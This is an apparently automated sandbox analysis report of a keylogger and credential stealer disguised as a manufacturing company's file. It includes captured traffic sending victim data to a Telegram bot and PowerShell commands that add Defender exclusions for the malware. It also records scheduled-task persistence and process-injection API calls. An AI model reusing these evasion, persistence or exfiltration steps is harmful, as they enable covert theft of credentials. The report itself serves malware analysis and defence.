                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QU47aGA%2F%2B9PT16SNcB38bH9jpoVk1Bk3Wdh0WJb%2BE6dbyOEnAE%2BV%2BxLX%2B3n680s15uGatnOSjdqwFQ4b9DijF8UoOglrRuMroLo5zoPhPDN6y1ZCn0cMeAU8U2A%2BRkJaVfeSz2nv"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc946fe8b0caa-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.1049740188.114.97.34434820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-08-29 10:16:33 UTC716INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:33 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25176
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43i2MjfUPffF%2Bia1LT%2FUhwsU4zw11m0v0BzPBBhWpdyCFqPg%2BFYX7Cp%2BmKmYEIOpMe2uA3WfIC8DV9u3NQJIiic8Gb4RMUBEiOM0pPmS%2FYNfrnrm9M%2Ff3%2FvUwfjnHs8mOda1c%2FEF"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc9476b9e42b3-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.1049742149.154.167.2204434820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:33 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: Keep-Alive
                                        2024-08-29 10:16:34 UTC344INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Date: Thu, 29 Aug 2024 10:16:34 GMT
                                        Content-Type: application/json
                                        Content-Length: 55
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2024-08-29 10:16:34 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.1049743188.114.97.34434268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:34 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-08-29 10:16:34 UTC708INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:34 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25177
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UF8sNsivdJ1thsltp4EX8Fmp2kNFs%2FX3kom2A7%2BGtdVMn6z7G7uCfgYXzi4qpKzeszr2HCmsUb1XKUbmEBHLngz%2FjRL2Sp5S4ykwE9F%2BErdD14B0N4y1Jh6i8V9QLBnL8f06GQzh"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc94eeeb60cb1-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:34 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.1049745188.114.97.34434268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:35 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-08-29 10:16:35 UTC702INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:35 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25178
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cBRDTzQcdWdBbO47NmOJKrOyBNxF8gg7FSnzvAfvKJ%2F8LA7Wl92OCjEjdrnaRCbVWmW2OVkSzO6Ypsg50mabP4AJWbYUe2bHyk74pUlO2qZYbjmLnrNJDB6GLBbLxgV5lAravgUY"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc956efe55e74-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:35 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.1049746149.154.167.2204434268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:36 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: Keep-Alive
                                        2024-08-29 10:16:36 UTC344INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Date: Thu, 29 Aug 2024 10:16:36 GMT
                                        Content-Type: application/json
                                        Content-Length: 55
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2024-08-29 10:16:36 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:06:16:10
                                        Start date:29/08/2024
                                        Path:C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
                                        Imagebase:0x90000
                                        File size:792'576 bytes
                                        MD5 hash:B2FCDE172F7605E8A4AF7B60349418D7
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        Target ID:3
                                        Start time:06:16:11
                                        Start date:29/08/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
                                        Imagebase:0xf00000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:06:16:11
                                        Start date:29/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff620390000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:06:16:12
                                        Start date:29/08/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
                                        Imagebase:0xf00000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:06:16:12
                                        Start date:29/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff620390000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:06:16:12
                                        Start date:29/08/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp"
                                        Imagebase:0x6f0000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:06:16:12
                                        Start date:29/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff620390000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:11
                                        Start time:06:16:13
                                        Start date:29/08/2024
                                        Path:C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
                                        Imagebase:0x8c0000
                                        File size:792'576 bytes
                                        MD5 hash:B2FCDE172F7605E8A4AF7B60349418D7
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        Target ID:12
                                        Start time:06:16:14
                                        Start date:29/08/2024
                                        Path:C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        Imagebase:0xec0000
                                        File size:792'576 bytes
                                        MD5 hash:B2FCDE172F7605E8A4AF7B60349418D7
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 58%, ReversingLabs
                                        • Detection: 61%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        Target ID:13
                                        Start time:06:16:15
                                        Start date:29/08/2024
                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0x7ff6616b0000
                                        File size:496'640 bytes
                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:18
                                        Start time:06:16:17
                                        Start date:29/08/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp"
                                        Imagebase:0x6f0000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:19
                                        Start time:06:16:17
                                        Start date:29/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff620390000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:20
                                        Start time:06:16:17
                                        Start date:29/08/2024
                                        Path:C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
                                        Imagebase:0xe70000
                                        File size:792'576 bytes
                                        MD5 hash:B2FCDE172F7605E8A4AF7B60349418D7
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:10.2%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:52
                                          Total number of Limit Nodes:5
                                          execution_graph 24553 b0b430 24556 b0b519 24553->24556 24554 b0b43f 24557 b0b539 24556->24557 24558 b0b55c 24556->24558 24557->24558 24564 b0b7c0 24557->24564 24568 b0b7b1 24557->24568 24558->24554 24559 b0b554 24559->24558 24560 b0b760 GetModuleHandleW 24559->24560 24561 b0b78d 24560->24561 24561->24554 24565 b0b7d4 24564->24565 24567 b0b7f9 24565->24567 24572 b0b238 24565->24572 24567->24559 24569 b0b7d4 24568->24569 24570 b0b238 LoadLibraryExW 24569->24570 24571 b0b7f9 24569->24571 24570->24571 24571->24559 24573 b0b9a0 LoadLibraryExW 24572->24573 24575 b0ba19 24573->24575 24575->24567 24599 b0d7c0 24600 b0d806 24599->24600 24604 b0d9a0 24600->24604 24607 b0d99a 24600->24607 24601 b0d8f3 24610 b0b414 24604->24610 24608 b0d9ce 24607->24608 24609 b0b414 DuplicateHandle 24607->24609 24608->24601 24609->24608 24611 b0da08 DuplicateHandle 24610->24611 24612 b0d9ce 24611->24612 24612->24601 24583 671a890 24584 671a8d0 VirtualAllocEx 24583->24584 24586 671a90d 24584->24586 24587 671a950 24588 671a998 WriteProcessMemory 24587->24588 24590 671a9ef 24588->24590 24613 671aa40 24614 671aa8b ReadProcessMemory 24613->24614 24616 671aacf 24614->24616 24617 671a380 24618 671a3c5 Wow64SetThreadContext 24617->24618 24620 671a40d 24618->24620 24576 671ea68 24577 671ebf3 24576->24577 24579 671ea8e 24576->24579 24579->24577 24580 671ac80 24579->24580 24581 671ece8 PostMessageW 24580->24581 24582 671ed54 24581->24582 24582->24579 24591 6719e98 24592 6719ed8 ResumeThread 24591->24592 24594 6719f09 24592->24594 24595 671afd8 24596 671b061 CreateProcessA 24595->24596 24598 671b223 24596->24598 24598->24598
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa99f1cd47a8760b35233fc61c8be6666a8d583b1992800a92a768fd3a354b20
                                          • Instruction ID: a388cb886115cb975467703ed415f8ff3c2fde83cb4dad1cfba33b02e761d249
                                          • Opcode Fuzzy Hash: fa99f1cd47a8760b35233fc61c8be6666a8d583b1992800a92a768fd3a354b20
                                          • Instruction Fuzzy Hash: 88327C71B016049FDB55EB69C460BAEB7F6AF89700F2444AAE146DF3A1CB38ED01CB51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 311 671afcc-671b06d 314 671b0a6-671b0c6 311->314 315 671b06f-671b079 311->315 320 671b0c8-671b0d2 314->320 321 671b0ff-671b12e 314->321 315->314 316 671b07b-671b07d 315->316 318 671b0a0-671b0a3 316->318 319 671b07f-671b089 316->319 318->314 322 671b08b 319->322 323 671b08d-671b09c 319->323 320->321 324 671b0d4-671b0d6 320->324 331 671b130-671b13a 321->331 332 671b167-671b221 CreateProcessA 321->332 322->323 323->323 325 671b09e 323->325 326 671b0f9-671b0fc 324->326 327 671b0d8-671b0e2 324->327 325->318 326->321 329 671b0e4 327->329 330 671b0e6-671b0f5 327->330 329->330 330->330 333 671b0f7 330->333 331->332 334 671b13c-671b13e 331->334 343 671b223-671b229 332->343 344 671b22a-671b2b0 332->344 333->326 336 671b161-671b164 334->336 337 671b140-671b14a 334->337 336->332 338 671b14c 337->338 339 671b14e-671b15d 337->339 338->339 339->339 340 671b15f 339->340 340->336 343->344 354 671b2c0-671b2c4 344->354 355 671b2b2-671b2b6 344->355 356 671b2d4-671b2d8 354->356 357 671b2c6-671b2ca 354->357 355->354 358 671b2b8 355->358 360 671b2e8-671b2ec 356->360 361 671b2da-671b2de 356->361 357->356 359 671b2cc 357->359 358->354 359->356 363 671b2fe-671b305 360->363 364 671b2ee-671b2f4 360->364 361->360 362 671b2e0 361->362 362->360 365 671b307-671b316 363->365 366 671b31c 363->366 364->363 365->366 367 671b31d 366->367 367->367
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0671B20E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: Tt$Tt
                                          • API String ID: 963392458-2684252306
                                          • Opcode ID: 71014c7b2a2ce5fd67882af032e22713f8f42e97d91d5564e3e69b0e6d703fc0
                                          • Instruction ID: 1a48a316cb90f1687c4837721d73b15b50d65311b1987ac87cd882c16197ee2a
                                          • Opcode Fuzzy Hash: 71014c7b2a2ce5fd67882af032e22713f8f42e97d91d5564e3e69b0e6d703fc0
                                          • Instruction Fuzzy Hash: 02A15C71D00719CFEB54CFA9C841BEEBBB2BF49710F14856AE814AB280D7749985CF91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
